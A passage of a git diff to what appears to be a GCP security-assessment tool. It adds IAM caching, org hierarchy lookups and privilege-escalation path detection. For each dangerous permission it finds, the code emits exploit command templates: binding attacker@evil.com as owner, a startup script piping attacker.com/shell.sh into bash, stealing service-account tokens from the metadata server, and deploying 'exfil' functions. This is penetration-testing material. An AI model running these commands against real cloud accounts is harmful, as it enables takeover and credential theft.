- output, - ) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, - "Could not write output") - } + return tables } diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index a3d222c1..6ef1bbc5 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -846,6 +846,10 @@ var rolePermissionsCache = make(map[string][]string) // rolePermissionsFailureCache tracks roles we've already failed to look up (to avoid duplicate error logs) var rolePermissionsFailureCache = make(map[string]bool) +// orgRoleAccessChecked tracks if we've already tried to access org-level custom roles +var orgRoleAccessChecked bool +var orgRoleAccessAvailable bool + // GetRolePermissions retrieves the permissions for a given role func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { // Check cache first @@ -888,11 +892,32 @@ func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([ permissions = role.IncludedPermissions } else if strings.HasPrefix(roleName, "organizations/") { // Organization-level custom role + // Check if we already know org roles are inaccessible + if orgRoleAccessChecked && !orgRoleAccessAvailable { + rolePermissionsFailureCache[roleName] = true + return nil, gcpinternal.ErrPermissionDenied + } + role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() if err != nil { // Cache the failure to avoid repeated error logs rolePermissionsFailureCache[roleName] = true - return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + + // Check if this is a permission error - if so, mark org roles as inaccessible + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + if gcpinternal.IsPermissionDenied(parsedErr) && !orgRoleAccessChecked { + orgRoleAccessChecked = true + orgRoleAccessAvailable = false + // Log once that org-level custom roles are not accessible + logger.InfoM("Organization-level custom roles not accessible - role permissions will not be expanded", globals.GCP_IAM_MODULE_NAME) + } + return nil, parsedErr + } + + // Mark org role access as available on first success + if !orgRoleAccessChecked { + orgRoleAccessChecked = true + orgRoleAccessAvailable = true } permissions = role.IncludedPermissions } @@ -958,6 +983,13 @@ func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, // Get permissions for this role permissions, err := s.GetRolePermissions(ctx, binding.Role) if err != nil { + // Only log if this role wasn't already in the failure cache (to avoid duplicate messages) + // and if we haven't already determined org roles are inaccessible + isOrgRole := strings.HasPrefix(binding.Role, "organizations/") + if isOrgRole && orgRoleAccessChecked && !orgRoleAccessAvailable { + // Skip logging for org roles we know we can't access + continue + } gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, fmt.Sprintf("Could not get permissions for role %s", binding.Role)) continue @@ -1096,14 +1128,46 @@ func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) return groupInfo, nil } +// cloudIdentityAPIChecked tracks whether we've already checked Cloud Identity API availability +var cloudIdentityAPIChecked bool +var cloudIdentityAPIAvailable bool + // GetGroupMemberships retrieves members for all groups found in IAM bindings func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo) []GroupInfo { var enrichedGroups []GroupInfo - for _, group := range groups { + // Skip if we already know Cloud Identity API is not available + if cloudIdentityAPIChecked && !cloudIdentityAPIAvailable { + // Return groups as-is without attempting enumeration + for _, group := range groups { + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + } + return enrichedGroups + } + + for i, group := range groups { enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) if err != nil { - // Log but don't fail - Cloud Identity API access is often restricted + // Check if this is an API not enabled error + errStr := err.Error() + if strings.Contains(errStr, "API not enabled") || strings.Contains(errStr, "has not been used") || + strings.Contains(errStr, "cloudidentity.googleapis.com") { + // Mark API as unavailable to skip future attempts + if !cloudIdentityAPIChecked { + cloudIdentityAPIChecked = true + cloudIdentityAPIAvailable = false + logger.InfoM("Cloud Identity API not available - skipping group membership enumeration", globals.GCP_IAM_MODULE_NAME) + } + // Return remaining groups without attempting enumeration + for j := i; j < len(groups); j++ { + groups[j].MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, groups[j]) + } + return enrichedGroups + } + + // Log other errors but continue trying other groups gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, fmt.Sprintf("Could not enumerate membership for group %s", group.Email)) // Keep the original group info without membership @@ -1111,6 +1175,13 @@ func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo enrichedGroups = append(enrichedGroups, group) continue } + + // Mark API as available on first success + if !cloudIdentityAPIChecked { + cloudIdentityAPIChecked = true + cloudIdentityAPIAvailable = true + } + // Preserve the roles from the original group enrichedGroup.Roles = group.Roles enrichedGroup.ProjectID = group.ProjectID diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go index ae4c2654..4f73fc7e 100644 --- a/gcp/services/organizationsService/organizationsService.go +++ b/gcp/services/organizationsService/organizationsService.go @@ -291,6 +291,7 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy var projectsClient *resourcemanager.ProjectsClient var foldersClient *resourcemanager.FoldersClient + var orgsClient *resourcemanager.OrganizationsClient var err error if s.session != nil { @@ -313,16 +314,34 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy } defer foldersClient.Close() + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + var ancestry []HierarchyNode resourceID := "projects/" + projectID for { if strings.HasPrefix(resourceID, "organizations/") { orgID := strings.TrimPrefix(resourceID, "organizations/") + displayName := orgID // Default to numeric ID if we can't get display name + + // Try to get the org's display name + org, err := orgsClient.GetOrganization(ctx, &resourcemanagerpb.GetOrganizationRequest{Name: resourceID}) + if err == nil && org.DisplayName != "" { + displayName = org.DisplayName + } + ancestry = append(ancestry, HierarchyNode{ Type: "organization", ID: orgID, - DisplayName: resourceID, + DisplayName: displayName, }) break } else if strings.HasPrefix(resourceID, "folders/") { @@ -385,6 +404,67 @@ func (s *OrganizationsService) GetOrganizationIDFromProject(projectID string) (s return "", fmt.Errorf("no organization found in ancestry for project %s", projectID) } +// ------------------------------ +// HierarchyDataProvider Implementation +// ------------------------------ + +// GetProjectAncestryForHierarchy returns ancestry in the format needed by BuildScopeHierarchy +func (s *OrganizationsService) GetProjectAncestryForHierarchy(projectID string) ([]gcpinternal.AncestryNode, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return nil, err + } + + result := make([]gcpinternal.AncestryNode, len(ancestry)) + for i, node := range ancestry { + result[i] = gcpinternal.AncestryNode{ + Type: node.Type, + ID: node.ID, + DisplayName: node.DisplayName, + Parent: node.Parent, + Depth: node.Depth, + } + } + return result, nil +} + +// SearchOrganizationsForHierarchy returns orgs in the format needed by BuildScopeHierarchy +func (s *OrganizationsService) SearchOrganizationsForHierarchy() ([]gcpinternal.OrganizationData, error) { + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + result := make([]gcpinternal.OrganizationData, len(orgs)) + for i, org := range orgs { + result[i] = gcpinternal.OrganizationData{ + Name: org.Name, + DisplayName: org.DisplayName, + } + } + return result, nil +} + +// HierarchyProvider wraps OrganizationsService to implement HierarchyDataProvider +type HierarchyProvider struct { + svc *OrganizationsService +} + +// NewHierarchyProvider creates a HierarchyProvider from an OrganizationsService +func NewHierarchyProvider(svc *OrganizationsService) *HierarchyProvider { + return &HierarchyProvider{svc: svc} +} + +// GetProjectAncestry implements HierarchyDataProvider +func (p *HierarchyProvider) GetProjectAncestry(projectID string) ([]gcpinternal.AncestryNode, error) { + return p.svc.GetProjectAncestryForHierarchy(projectID) +} + +// SearchOrganizations implements HierarchyDataProvider +func (p *HierarchyProvider) SearchOrganizations() ([]gcpinternal.OrganizationData, error) { + return p.svc.SearchOrganizationsForHierarchy() +} + // BuildHierarchy builds a complete hierarchy tree func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { // Get organizations diff --git a/gcp/services/privescService/privescService.go b/gcp/services/privescService/privescService.go index fe9c070d..a0429382 100644 --- a/gcp/services/privescService/privescService.go +++ b/gcp/services/privescService/privescService.go @@ -5,15 +5,23 @@ import ( "fmt" "strings" + iampb "cloud.google.com/go/iam/apiv1/iampb" + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "google.golang.org/api/cloudresourcemanager/v1" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" ) type PrivescService struct { session *gcpinternal.SafeSession } +var logger = internal.NewLogger() + func New() *PrivescService { return &PrivescService{} } @@ -33,6 +41,21 @@ type PrivescPath struct { Description string `json:"description"` // Explanation ExploitCommand string `json:"exploitCommand"` // Command to exploit ProjectID string `json:"projectId"` + // Scope information - where the role binding exists + ScopeType string `json:"scopeType"` // organization, folder, project + ScopeID string `json:"scopeId"` // The org/folder/project ID where binding exists + ScopeName string `json:"scopeName"` // Display name of the scope +} + +// CombinedPrivescData holds all privesc data across org/folder/project levels +type CombinedPrivescData struct { + OrgPaths []PrivescPath `json:"orgPaths"` + FolderPaths []PrivescPath `json:"folderPaths"` + ProjectPaths []PrivescPath `json:"projectPaths"` + AllPaths []PrivescPath `json:"allPaths"` + OrgNames map[string]string `json:"orgNames"` + FolderNames map[string]string `json:"folderNames"` + OrgIDs []string `json:"orgIds"` } // DangerousPermission represents a permission that enables privilege escalation @@ -44,6 +67,8 @@ type DangerousPermission struct { } // GetDangerousPermissions returns the list of known dangerous GCP permissions +// Based on: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ +// and: https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ func GetDangerousPermissions() []DangerousPermission { return []DangerousPermission{ // Service Account Impersonation - CRITICAL @@ -60,13 +85,17 @@ func GetDangerousPermissions() []DangerousPermission { {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, - {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to service accounts"}, - {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify custom role permissions"}, + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Grant access to service accounts"}, + {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify custom role permissions"}, {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, // Compute Access - HIGH + {Permission: "compute.instances.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create compute instances"}, {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, + {Permission: "compute.disks.create", Category: "Compute", RiskLevel: "MEDIUM", Description: "Create compute disks"}, + {Permission: "compute.subnetworks.use", Category: "Compute", RiskLevel: "MEDIUM", Description: "Use subnetworks for instances"}, + {Permission: "compute.subnetworks.useExternalIp", Category: "Compute", RiskLevel: "MEDIUM", Description: "Assign external IPs to instances"}, {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, @@ -75,15 +104,23 @@ func GetDangerousPermissions() []DangerousPermission { {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, + {Permission: "cloudfunctions.functions.call", Category: "Serverless", RiskLevel: "MEDIUM", Description: "Invoke cloud functions"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function IAM policy (make public)"}, // Cloud Run - HIGH {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, + {Permission: "run.services.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service IAM policy (make public)"}, + {Permission: "run.routes.invoke", Category: "Serverless", RiskLevel: "MEDIUM", Description: "Invoke Cloud Run services"}, // Cloud Build - HIGH - {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "HIGH", Description: "Run builds with Cloud Build SA"}, + {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "CRITICAL", Description: "Run builds with Cloud Build SA"}, {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configurations"}, + // Cloud Scheduler - HIGH + {Permission: "cloudscheduler.jobs.create", Category: "Scheduler", RiskLevel: "HIGH", Description: "Create scheduled jobs with SA identity"}, + {Permission: "cloudscheduler.locations.list", Category: "Scheduler", RiskLevel: "LOW", Description: "List scheduler locations"}, + // GKE - HIGH {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, @@ -97,14 +134,15 @@ func GetDangerousPermissions() []DangerousPermission { {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, - // Org Policies - HIGH - {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "HIGH", Description: "Modify organization policies"}, + // Org Policies - CRITICAL + {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "CRITICAL", Description: "Disable organization policy constraints"}, - // Deployment Manager - HIGH - {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "HIGH", Description: "Deploy resources with DM SA"}, + // Deployment Manager - CRITICAL + {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "CRITICAL", Description: "Deploy arbitrary infrastructure with DM SA"}, // API Keys - MEDIUM - {Permission: "serviceusage.apiKeys.create", Category: "API Keys", RiskLevel: "MEDIUM", Description: "Create API keys"}, + {Permission: "serviceusage.apiKeys.create", Category: "API Keys", RiskLevel: "HIGH", Description: "Create API keys for project access"}, + {Permission: "serviceusage.apiKeys.list", Category: "API Keys", RiskLevel: "MEDIUM", Description: "List existing API keys"}, // Actor permissions {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, @@ -113,22 +151,27 @@ func GetDangerousPermissions() []DangerousPermission { // AnalyzeProjectPrivesc analyzes a project for privilege escalation paths func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, error) { + return s.AnalyzeProjectPrivescWithName(projectID, projectID) +} + +// AnalyzeProjectPrivescWithName analyzes a project for privilege escalation paths with display name +func (s *PrivescService) AnalyzeProjectPrivescWithName(projectID, projectName string) ([]PrivescPath, error) { ctx := context.Background() // Get project IAM policy - var crmService *cloudresourcemanager.Service + var crmService *crmv1.Service var err error if s.session != nil { - crmService, err = cloudresourcemanager.NewService(ctx, s.session.GetClientOption()) + crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) } else { - crmService, err = cloudresourcemanager.NewService(ctx) + crmService, err = crmv1.NewService(ctx) } if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() + policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } @@ -158,7 +201,7 @@ func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, // Check each member for dangerous permissions for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForPrivesc(member, binding.Role, permissions, projectID) + memberPaths := s.analyzePermissionsForPrivescWithScope(member, binding.Role, permissions, projectID, "project", projectID, projectName) paths = append(paths, memberPaths...) } } @@ -264,149 +307,539 @@ func (s *PrivescService) analyzePermissionsForPrivesc(member, role string, permi // Check for direct dangerous permissions foundDangerous := make(map[string]DangerousPermission) + permSet := make(map[string]bool) for _, perm := range permissions { + permSet[perm] = true if dp, ok := dangerousMap[perm]; ok { foundDangerous[perm] = dp } } + // Helper to check if permission exists + hasPerm := func(perm string) bool { + return permSet[perm] + } + // Generate privesc paths based on found permissions principalType := getPrincipalType(member) cleanMember := cleanMemberName(member) - // SA Token Creation + // ======================================== + // SERVICE ACCOUNT IMPERSONATION - CRITICAL + // ======================================== + + // SA Token Creation (GetServiceAccountAccessToken) if dp, ok := foundDangerous["iam.serviceAccounts.getAccessToken"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "SA Token Creation", + Method: "GetServiceAccountAccessToken", TargetResource: "All project service accounts", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, - Description: "Can generate access tokens for any service account in the project", + RiskLevel: "CRITICAL", + Description: "Can generate access tokens for service accounts to impersonate them", ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), ProjectID: projectID, }) } - // SA Key Creation + // SA Key Creation (CreateServiceAccountKey) if dp, ok := foundDangerous["iam.serviceAccountKeys.create"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "SA Key Creation", + Method: "CreateServiceAccountKey", TargetResource: "All project service accounts", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, - Description: "Can create persistent keys for any service account", + RiskLevel: "CRITICAL", + Description: "Can create persistent keys for service accounts to impersonate them", ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), ProjectID: projectID, }) } - // Project IAM Modification + // SA Implicit Delegation (ServiceAccountImplicitDelegation) + if dp, ok := foundDangerous["iam.serviceAccounts.implicitDelegation"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ServiceAccountImplicitDelegation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can delegate permissions between service accounts for chained impersonation", + ExploitCommand: "# Use delegation chain: SA1 -> SA2 -> SA3\ngcloud auth print-access-token --impersonate-service-account=SA3 --delegates=SA1,SA2", + ProjectID: projectID, + }) + } + + // SA SignBlob (ServiceAccountSignBlob) + if dp, ok := foundDangerous["iam.serviceAccounts.signBlob"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ServiceAccountSignBlob", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can sign arbitrary blobs as SA (create GCS signed URLs, forge tokens)", + ExploitCommand: fmt.Sprintf("gsutil signurl -u TARGET_SA@%s.iam.gserviceaccount.com gs://bucket/object", projectID), + ProjectID: projectID, + }) + } + + // SA SignJwt (ServiceAccountSignJwt) + if dp, ok := foundDangerous["iam.serviceAccounts.signJwt"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ServiceAccountSignJwt", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can sign JWTs as SA to impersonate service accounts", + ExploitCommand: "# Sign JWT to get access token as SA\ncurl -X POST -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"payload\": \"...\"}' \\\n https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/TARGET_SA:signJwt", + ProjectID: projectID, + }) + } + + // ======================================== + // KEY CREATION + // ======================================== + + // HMAC Key Creation (CreateServiceAccountHMACKey) + if dp, ok := foundDangerous["storage.hmacKeys.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "CreateServiceAccountHMACKey", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: "HIGH", + Description: "Can create HMAC keys for S3-compatible API access as service account", + ExploitCommand: fmt.Sprintf("gsutil hmac create TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // ======================================== + // IAM POLICY MODIFICATION - CRITICAL + // ======================================== + + // Project IAM Modification (SetProjectIAMPolicy) if dp, ok := foundDangerous["resourcemanager.projects.setIamPolicy"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "Project IAM Modification", + Method: "SetProjectIAMPolicy", TargetResource: projectID, Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, + RiskLevel: "CRITICAL", Description: "Can modify project IAM policy to grant any role", ExploitCommand: fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@evil.com --role=roles/owner", projectID), ProjectID: projectID, }) } + // Folder IAM Modification (SetFolderIAMPolicy) + if dp, ok := foundDangerous["resourcemanager.folders.setIamPolicy"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SetFolderIAMPolicy", + TargetResource: "Folder (inherited to all projects)", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can modify folder IAM policy affecting all child projects", + ExploitCommand: "gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:attacker@evil.com --role=roles/owner", + ProjectID: projectID, + }) + } + + // Org IAM Modification (SetOrgIAMPolicy) + if dp, ok := foundDangerous["resourcemanager.organizations.setIamPolicy"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SetOrgIAMPolicy", + TargetResource: "Organization (inherited to all)", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can modify organization IAM policy affecting all folders and projects", + ExploitCommand: "gcloud organizations add-iam-policy-binding ORG_ID --member=user:attacker@evil.com --role=roles/owner", + ProjectID: projectID, + }) + } + + // Service Account IAM Modification (SetServiceAccountIAMPolicy) + if dp, ok := foundDangerous["iam.serviceAccounts.setIamPolicy"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SetServiceAccountIAMPolicy", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can grant others access to impersonate service accounts", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding TARGET_SA@%s.iam.gserviceaccount.com --member=user:attacker@evil.com --role=roles/iam.serviceAccountTokenCreator", projectID), + ProjectID: projectID, + }) + } + + // Update IAM Role (UpdateIAMRole) + if dp, ok := foundDangerous["iam.roles.update"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "UpdateIAMRole", + TargetResource: "Custom IAM roles", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can modify custom IAM roles to add powerful permissions", + ExploitCommand: fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=iam.serviceAccountKeys.create", projectID), + ProjectID: projectID, + }) + } + + // ======================================== + // ORG POLICY - CRITICAL + // ======================================== + + // Org Policy Modification (SetOrgPolicyConstraints) + if dp, ok := foundDangerous["orgpolicy.policy.set"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SetOrgPolicyConstraints", + TargetResource: "Organization policies", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can disable organization policy constraints (domain restriction, public access prevention, etc.)", + ExploitCommand: "gcloud org-policies reset constraints/iam.allowedPolicyMemberDomains --project=" + projectID, + ProjectID: projectID, + }) + } + + // ======================================== + // COMPUTE - HIGH + // ======================================== + // Compute Metadata Modification if dp, ok := foundDangerous["compute.instances.setMetadata"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "Compute Metadata Injection", + Method: "ComputeMetadataInjection", TargetResource: "All project instances", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, + RiskLevel: "HIGH", Description: "Can inject SSH keys or startup scripts into instances", - ExploitCommand: "gcloud compute instances add-metadata INSTANCE --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'", + ExploitCommand: fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --project=%s --metadata=startup-script='#!/bin/bash\\ncurl http://attacker.com/shell.sh | bash'", projectID), ProjectID: projectID, }) } - // Cloud Functions Deployment - if _, ok := foundDangerous["cloudfunctions.functions.create"]; ok { - if _, hasActAs := foundDangerous["iam.serviceAccounts.actAs"]; hasActAs { + // Create GCE Instance with SA (CreateGCEInstanceWithSA) + // Requires multiple permissions working together + if hasPerm("compute.instances.create") && hasPerm("iam.serviceAccounts.actAs") { + requiredPerms := []string{"compute.instances.create", "iam.serviceAccounts.actAs"} + // Check for additional required permissions + hasAllPerms := true + optionalPerms := []string{"compute.disks.create", "compute.instances.setMetadata", "compute.instances.setServiceAccount", "compute.subnetworks.use"} + for _, p := range optionalPerms { + if hasPerm(p) { + requiredPerms = append(requiredPerms, p) + } + } + if hasAllPerms { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "Cloud Functions SA Abuse", - TargetResource: "Cloud Functions", - Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, - RiskLevel: "HIGH", - Description: "Can deploy functions with privileged service account identity", - ExploitCommand: "gcloud functions deploy pwned --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA", + Method: "CreateGCEInstanceWithSA", + TargetResource: "Compute instances with privileged SA", + Permissions: requiredPerms, + RiskLevel: "CRITICAL", + Description: "Can create GCE instance with privileged service account to steal its token", + ExploitCommand: fmt.Sprintf("gcloud compute instances create attacker-vm --project=%s --service-account=PRIVILEGED_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --metadata=startup-script='curl -s http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H \"Metadata-Flavor: Google\"'", projectID, projectID), ProjectID: projectID, }) } } - // Cloud Build + // OS Admin Login + if dp, ok := foundDangerous["compute.instances.osAdminLogin"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "OSAdminLogin", + TargetResource: "All project instances with OS Login", + Permissions: []string{dp.Permission}, + RiskLevel: "HIGH", + Description: "Can SSH into instances with sudo via OS Login", + ExploitCommand: fmt.Sprintf("gcloud compute ssh INSTANCE --project=%s", projectID), + ProjectID: projectID, + }) + } + + // ======================================== + // SERVERLESS - CRITICAL/HIGH + // ======================================== + + // Cloud Functions - Create with SA (ExfilCloudFunctionCredsAuthCall) + if hasPerm("cloudfunctions.functions.create") && hasPerm("iam.serviceAccounts.actAs") { + perms := []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"} + if hasPerm("cloudfunctions.functions.sourceCodeSet") { + perms = append(perms, "cloudfunctions.functions.sourceCodeSet") + } + method := "ExfilCloudFunctionCredsAuthCall" + desc := "Can deploy function with privileged SA and invoke it to exfiltrate credentials" + if hasPerm("cloudfunctions.functions.call") { + perms = append(perms, "cloudfunctions.functions.call") + } + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: method, + TargetResource: "Cloud Functions", + Permissions: perms, + RiskLevel: "CRITICAL", + Description: desc, + ExploitCommand: fmt.Sprintf("gcloud functions deploy exfil --project=%s --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA@%s.iam.gserviceaccount.com --source=. --entry-point=exfil", projectID, projectID), + ProjectID: projectID, + }) + } + + // Cloud Functions - Create with SA and make public (ExfilCloudFunctionCredsUnauthCall) + if hasPerm("cloudfunctions.functions.create") && hasPerm("iam.serviceAccounts.actAs") && hasPerm("cloudfunctions.functions.setIamPolicy") { + perms := []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs", "cloudfunctions.functions.setIamPolicy"} + if hasPerm("cloudfunctions.functions.sourceCodeSet") { + perms = append(perms, "cloudfunctions.functions.sourceCodeSet") + } + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ExfilCloudFunctionCredsUnauthCall", + TargetResource: "Cloud Functions (public)", + Permissions: perms, + RiskLevel: "CRITICAL", + Description: "Can deploy function with privileged SA and make it publicly accessible", + ExploitCommand: fmt.Sprintf("gcloud functions deploy exfil --project=%s --runtime=python39 --trigger-http 